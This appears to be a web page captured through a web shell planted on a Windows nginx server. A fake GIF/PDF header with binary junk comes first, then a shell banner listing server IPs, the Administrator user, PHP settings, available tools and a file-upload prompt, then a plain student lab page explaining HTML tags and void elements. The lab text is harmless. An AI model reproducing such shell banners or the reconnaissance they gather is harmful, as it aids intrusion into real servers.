GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1022/Labs/_Archive/Lab04/example/content/ |
Upload File : |
<link href="../Lab04.css" rel="stylesheet" type="text/css"> <img src="http://www.w3schools.com/HTML/pic_HTML5.gif" title="HTML5"> <article> <h2><a href="GlosseryHTML.html">HTML</a></h2> <a href="GlosseryHTML.html">HTML</a> is a markup language for describing web documents (web pages). <a href="GlosseryHTML.html">HTML</a> tags normally come in pairs like <p> and </p>. The first tag in a pair is the start tag, the second tag is the end tag. The end tag is written like the start tag, but with a slash before the tag name. The start tag is often called the opening tag. The end tag is often called the closing tag. <a href="GlosseryHTML.html">HTML</a> elements with no content are called empty or void elements. <br> is an empty or void element without a closing tag (the <br> tag defines a line break). Empty or void elements have no closing tag. </article>